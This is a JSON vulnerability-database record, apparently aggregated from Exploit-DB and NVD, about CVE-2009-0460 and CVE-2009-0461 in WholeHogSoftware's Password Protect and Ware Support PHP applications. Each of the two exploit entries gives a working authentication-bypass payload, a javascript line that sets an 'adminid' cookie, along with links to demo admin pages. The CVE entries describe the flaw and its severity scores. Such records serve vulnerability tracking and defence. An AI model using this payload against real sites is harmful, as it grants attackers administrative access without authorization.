{"id": "EDB-ID:7952", "type": "exploitdb", "bulletinFamily": "exploit", "title": "WholeHogSoftware Password Protect Insecure Cookie Handling Vuln", "description": "WholeHogSoftware Password Protect Insecure Cookie Handling Vuln. CVE-2009-0460,CVE-2009-0461. Webapps exploit for php platform", "published": "2009-02-03T00:00:00", "modified": "2009-02-03T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/7952/", "reporter": "Stack", "references": [], "cvelist": ["CVE-2009-0460", "CVE-2009-0461"], "lastseen": "2016-02-01T03:24:46", "viewCount": 8, "enchantments": {"score": {"value": 7.2, "vector": "NONE", "modified": "2016-02-01T03:24:46", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-0461", "CVE-2009-0460"]}, {"type": "exploitdb", "idList": ["EDB-ID:7951"]}], "modified": "2016-02-01T03:24:46", "rev": 2}, "vulnersScore": 7.2}, "sourceHref": "https://www.exploit-db.com/download/7952/", "sourceData": "###########################################################################\n[+] WholeHogSoftware Password Protect Insecure Cookie Handling Vulnerability\n[+] Script :Password Protect\n[+] Site :http://wholehogsoftware.com\n[+] Detay :http://www.wholehogsoftware.com/index.php/page/password_protect_enhanced\n[+] Discovered By Mountassif Moad \n \n[+] www.v4-team.com \n \n[+] Greetz : All my Freind\n###########################################################################\nExploit:\njavascript:document.cookie = \"adminid=8; path=/\";\nDeMo :\nhttp://www.wholehogsoftware.com/demo/password_protect_enhanced/admin\n\n# milw0rm.com [2009-02-03]\n", "osvdbidlist": ["51734"]}

{"cve": [{"lastseen": "2021-02-02T05:39:59", "description": "Whole Hog Password Protect: Enhanced 1.x allows remote attackers to bypass authentication and obtain administrative access via an integer value in the adminid cookie.", "edition": 4, "cvss3": {}, "published": "2009-02-10T07:00:00", "title": "CVE-2009-0461", "type": "cve", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-0461"], "modified": "2017-10-19T01:30:00", "cpe": ["cpe:/a:wholehogsoftware:password_protect:1.0"], "id": "CVE-2009-0461", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0461", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:wholehogsoftware:password_protect:1.0:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:39:59", "description": "Whole Hog Ware Support 1.x allows remote attackers to bypass authentication and obtain administrative access via an integer value in the adminid cookie.", "edition": 4, "cvss3": {}, "published": "2009-02-10T07:00:00", "title": "CVE-2009-0460", "type": "cve", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-0460"], "modified": "2017-10-19T01:30:00", "cpe": ["cpe:/a:wholehogsoftware:ware_support:1.0"], "id": "CVE-2009-0460", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0460", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:wholehogsoftware:ware_support:1.0:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-02-01T03:24:37", "description": "WholeHogSoftware Ware Support Insecure Cookie Handling Vulnerability. CVE-2009-0460,CVE-2009-0461. Webapps exploit for php platform", "published": "2009-02-03T00:00:00", "type": "exploitdb", "title": "WholeHogSoftware Ware Support Insecure Cookie Handling Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0460", "CVE-2009-0461"], "modified": "2009-02-03T00:00:00", "id": "EDB-ID:7951", "href": "https://www.exploit-db.com/exploits/7951/", "sourceData": "###########################################################################\n[+] WholeHogSoftware Ware Support Insecure Cookie Handling Vulnerability\n[+] Script :Ware Support\n[+] Site :http://wholehogsoftware.com\n[+] Detay :http://wholehogsoftware.com/index.php/page/ware_support\n[+] Discovered By Mountassif Moad \n \n[+] www.v4-team.com \n \n[+] Greetz : All my Freind\n###########################################################################\nExploit:\njavascript:document.cookie = \"adminid=8; path=/\";\nDeMo :\nhttp://www.wholehogsoftware.com/demo/support/admin/\n\n# milw0rm.com [2009-02-03]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/7951/"}]}